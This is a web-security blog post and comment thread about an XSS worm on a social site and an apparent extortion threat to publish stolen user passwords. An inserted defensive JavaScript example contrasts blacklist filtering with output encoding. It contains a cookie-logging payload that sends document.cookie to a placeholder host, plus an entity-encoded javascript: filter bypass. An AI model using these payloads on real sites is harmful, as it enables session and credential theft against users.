web application security lab

Full-disclosure extortion of

’s woes continue. Unsticky emailed me the original source code to the worm. It’s funny how this reminds me of actual virus fighting, where understanding the original variant helps explain how the later variants evolved. Here are the variants:

Original variant by unsticky:

Additional variants:

Additionally, Triphase from Hacking With Style got hold of me. What follows is a direct copy and paste from his email to me. (Btw, does not condone this sort of activity, but the 1,000 or so users who will be affected by this have a right to know):

Hello Rsnake,

I saw your blogpost on

Our response:

Indeed we have a list of usernames and passwords… about 900+, not counting the ones coming in every second…
As proof I’ll paste a short list of them:

Anyways, the admin has about 20 hours left to fix the bug, or the list WILL get public.


It is clear that Triphase will use the lists they have found against This is an interesting take on full disclosure, where the vulnerable website or application is told how long it has before the information that has been stolen from it is disclosed. Of course, this is not a new way to disclose information and it has been tried in the past, although I don’t recall it ever having been done in quite the same way. If does business in California this may fall under SB 1386, the state’s breach-notification law, which requires the owner to notify the affected users itself. Pretty nasty stuff and a pretty tough message: fix it or pay.

11 Responses to “Full-disclosure extortion of”

  1. Otsego Says:

    Is that wise for you to post that? Those passwords could well be the ones that they have for their email addresses.

  2. Luny Says:

    Tough message indeed. I know I mentioned in my blog to update if I had heard anything else from Triphase and this HWS group, but after thinking about it and reading this last email I received, it’s clear they only want attention.

  3. unsticky Says:

    They didn’t do anything special. They probably just put cookie loggers in the owners’ profiles, as Signatures. I’ve gotten a few accounts from the same thing, but I’m not threatening the site with that. What’s the good of releasing passwords to normal users’ accounts as a threat? It doesn’t accomplish anything.

  4. RSnake Says:

    Otsego, I’m pretty certain Triphase was going to release this information with or without my post, and I am attempting to raise awareness of the threat of his actual disclosure, which is far more disturbing. I don’t think I did them any more harm than if he had posted that information elsewhere, and hopefully the word will get out quicker as a result.

    Luny, I am in agreement about HWS’s intention of getting attention. Unfortunately they’ll get it if they start posting 1000’s of passwords, one way or another.

    Unsticky, I would agree, there is nothing overly complex about what they are doing, it’s more about raising awareness of the threat of mass XSS worms. In a way this kind of thing is really tough love in some weird sort of way. Hurting the site you are interested in to get them to fix it. It shouldn’t have to be that hard.

  5. blogged on » Archiv » XSS Wurm Says:

    […] The XSS worm, its variants and an e-mail from the person responsible can be found at […]

  6. Triphase Says:

    The problem is that we DO have admin and owner accounts…
    1 of the admins changed their account information.

    But as it looks for now… they fixed the problem…
    Well, at least… 1 of them… They fixed my Perl exploit…
    Now it’s time to wait for L4fu to get online and see if they fixed his exploit as well…

    If they didn’t… well, you know what happens…


  7. unsticky Says:

    My apologies then, I’m new to this ‘MyYearbook’ hacking bit. All I know is their incessant XSS vulns.

    Hey, I just logged into my account on their site and was prompted by a change password screen, so maybe you guys are making a little bit of progress. haha

  8. unsticky Says:

    I apologize for posting twice in a row, but I wanted to say that they upped their filters again. It seems they now strip element id’s, script:, img src’s, and probably more, but that’s all I’ve found… If only I’d worked a little bit more on it last night, there would’ve been a friendly Signature worm too. Now to move on to new input fields!
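The filter behaviour described in the comment above (stripping ids, the literal `script:` and `img src`) is a keyword blacklist, and comment 3 describes the payload such filters are meant to stop: a cookie logger planted in a profile signature. The block below is an added example, not code from the post, the commenters or the site, that puts a blacklist of that shape beside output encoding and runs both over three constructed payloads. The filter, the `containsActiveContent` heuristic, the payloads and the `logger.invalid` host are all assumptions made for illustration; none of them is the site’s real filter or the worm’s real code.

```javascript
// Added example (not from the original post, the commenters or the site):
// a keyword blacklist of the kind the thread describes, beside output
// encoding, tested against three constructed stored-XSS payloads.

// Constructed payloads (illustrative, not the worm). The first is a cookie
// logger of the sort comment 3 describes; logger.invalid is a placeholder host.
const PAYLOADS = [
  `<svg onload="new Image().src='http://logger.invalid/?c='+document.cookie">`,
  `<a href="java&#115;cript:alert(document.cookie)">my profile</a>`,
  `<a href="javascript:alert(document.cookie)">my profile</a>`,
];

// Hypothetical blacklist modelled on the behaviour described in the thread:
// strip element ids, the literal "script:" and src attributes on <img>.
function blacklistFilter(input) {
  return input
    .replace(/\sid\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    .replace(/script:/gi, '')
    .replace(/(<img\b[^>]*?)\ssrc\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '$1');
}

// The fix: encode for the HTML text context in which the signature is
// rendered, so no user-supplied character can open a tag or an attribute.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(input).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Browsers decode character references in attribute values before parsing
// the URL, which is why "java&#115;cript:" slips past a literal-string filter.
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(Number(d)));
}

// Heuristic (not a full HTML parser): does the markup still carry a tag that
// would execute script when rendered? Encoded output has no tags at all, so
// it never gets past the outer loop.
function containsActiveContent(html) {
  for (const [tagText] of html.matchAll(/<\w[^>]*>/g)) {
    if (/\bon\w+\s*=/i.test(tagText)) return true;                     // event handler attribute
    if (/^<(script|svg|iframe|object|embed)\b/i.test(tagText)) return true; // script-bearing element
    for (const [, v] of tagText.matchAll(/\b(?:href|src)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi)) {
      const value = decodeCharRefs(v.replace(/^["']|["']$/g, ''));
      if (/^\s*java\s*script\s*:/i.test(value)) return true;          // javascript: URL
    }
  }
  return false;
}

// Run every payload through both defences and report which one still
// leaves executable content behind.
function compareDefenses(inputs) {
  return inputs.map((p) => ({
    payload: p,
    blacklistBypassed: containsActiveContent(blacklistFilter(p)),
    encodingBypassed: containsActiveContent(encodeForHtml(p)),
  }));
}

console.table(compareDefenses(PAYLOADS).map(({ blacklistBypassed, encodingBypassed }, i) => ({
  payload: i + 1, blacklistBypassed, encodingBypassed,
})));
```

Run with `node`: the blacklist only stops the third payload (the literal `javascript:` URL); the `<svg onload>` logger never contained any of the blacklisted strings, and the entity-encoded `java&#115;cript:` is only decoded by the browser after the filter has already looked at it. Encoding every metacharacter for the context it lands in leaves nothing for any of the three to execute, which is why adding more strings to the strip list, as the thread describes the site doing, keeps losing.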

  9. Triphase Says:

    There are about 20 input fields vuln to this XSS…
    The personal page has a few, the “whatever i want” box is vuln…
    The my picture comment, and the Your comment on other peoples pictures for a start… but there are lots more…


  10. RSnake Says:

    I removed the passwords from the list as it is no longer required as proof. I haven’t heard anything about, so I assume they fixed the hole as there was no major disclosure mentioned.

  11. Triphase Says:

    They fixed a few, but not all…
    What they mostly did was a password change when you log in…
    When you log in you will be asked to change your password.

    Nice idea of them… but not good enough… we are still getting passwords every second and some security holes are still there…

    the full list is now online at
    or the direct link:

    Total passwords: 1234
    Not a joke, it really is 1234